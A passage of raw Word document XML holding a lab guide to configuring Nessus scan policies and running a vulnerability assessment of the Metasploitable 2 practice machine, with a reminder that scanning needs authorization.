          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Customize the policy settings, such as scan targets, port ranges, vulnerability checks, and other options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Save the policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83055" w:rsidRPr="00E83055" w:rsidRDefault="00E83055" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Perform Scans:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF6A49" w:rsidRPr="006F2646" w:rsidRDefault="00EF6A49" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2420245" cy="1203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auVWA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40197" cy="1213885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0015486A" w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2400300" cy="10801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3-07-10 at 17.59.49.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45562" cy="1100503"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>With the scan policy set up, you can initiate vulnerability scans by selecting the policy and specifying the target systems or IP addresses to scan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Start the scan and wait for Nessus to perform the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83055" w:rsidRPr="00E83055" w:rsidRDefault="00E83055" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Review Scan Results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF6A49" w:rsidRPr="006F2646" w:rsidRDefault="0015486A" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1813560" cy="2148774"/>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ssusTop5M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2458" cy="2159317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3208020" cy="162034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ssus-report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24703" cy="1628773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Once the scan is complete, you can review the scan results through the Nessus web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nessus will provide detailed information about identified vulnerabilities, including severity levels, remediation suggestions, and additional technical details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E83055" w:rsidRPr="00E83055" w:rsidRDefault="00E83055" w:rsidP="00E83055">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember that proper authorization is crucial when performing vulnerability assessments. Ensure that you have permission to scan the target systems, as unauthorized scanning can be considered illegal. Additionally, it's important to regularly update Nessus and its plugins to have the latest vulnerability checks and maintain the effectiveness of your assessments. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="006F2646" w:rsidRDefault="00A74538" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To conduct a comprehensive vulnerability assessment of Metasploitable 2 using Nessus, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Install and configure Nessus as mentioned in the previous response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Identify the IP address of the Metasploitable 2 machine. For example, assume the IP address is 192.168.0.10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Launch Nessus and log in using the administrator account you created during the setup.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Create a new scan policy specific to the Metasploitable 2 assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Navigate to the "Policies" section in the Nessus web interface.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Click on "New Policy" to create a new scan policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="00CE2F63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Customize the policy settings based on your requirements, including scan targets, port ranges, and vulnerability checks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Save the policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Initiate a vulnerability scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Select the newly created policy and specify the IP address of the Metasploitable 2 machine (e.g., 192.168.0.10) as the scan target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Start the scan and wait for Nessus to complete the assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Analyze the Nessus scan results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="009305D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009305D1" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Once the scan is finished, navigate to the "Scans" section in the Nessus web interface and select the completed scan for Metasploitable 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2646" w:rsidRPr="006F2646" w:rsidRDefault="009305D1" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Review the scan results for identified vulnerabilities, severity levels, and potential impacts.</w:t>
      </w:r>
      <w:r w:rsidR="00CE2F63" w:rsidRPr="006F2646">
        <w:rPr>
